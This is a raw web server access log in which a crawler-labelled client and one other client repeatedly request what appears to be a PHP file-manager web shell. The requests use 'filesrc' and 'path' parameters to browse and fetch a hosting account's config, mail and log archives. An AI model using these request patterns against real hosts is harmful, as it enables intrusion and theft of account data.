216.73.216.189 - - [01/Dec/2025:20:35:07 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2F.htaccess HTTP/1.1" 200 1107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:07 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fd4fae.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fetc HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fpublic_ftp HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:20:19:54 +0000] "GET / HTTP/1.1" 200 1497 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2709.94 Safari/537.36"
43.157.156.190 - - [01/Dec/2025:20:29:57 +0000] "GET /7709b/?filesrc=/home/i442524/public_html/7709b/index.php&path=/home/i442524/public_html/7709b HTTP/1.1" 200 3097 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.73.216.189 - - [01/Dec/2025:20:35:08 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fcontabilidad%40galavista.com_analytics.com_analytics.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 671 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:08 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Flogs.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 651 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:12 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.cl.selector.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:13 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fce685 HTTP/1.1" 200 1499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:13 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.caldav.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 2013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:13 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fa3d14.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:15 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.trash.zip&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 650 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:16 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fsegura.claudia%40galavista.com_analytics.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 746 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:16 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fcaches.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 651 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:16 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F7709b.zip&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 650 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:17 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fdfb27f996d.php HTTP/1.1" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:17 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F29b99.zip&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 650 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:17 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fetc.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:17 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Femail_accounts_count.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 657 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:18 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.mailbox_format.cpanel.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:18 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.razor.zip&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 651 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:18 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Ficals.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:19 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.subaccounts.zip&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 650 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:19 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fstraf HTTP/1.1" 200 1428 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:19 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.htaccess.htaccess.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:19 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.bashrc.bashrc.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 654 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:20 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fassets.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 651 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:20 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fce685.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 651 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:20 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fd4fae.zip&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 648 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
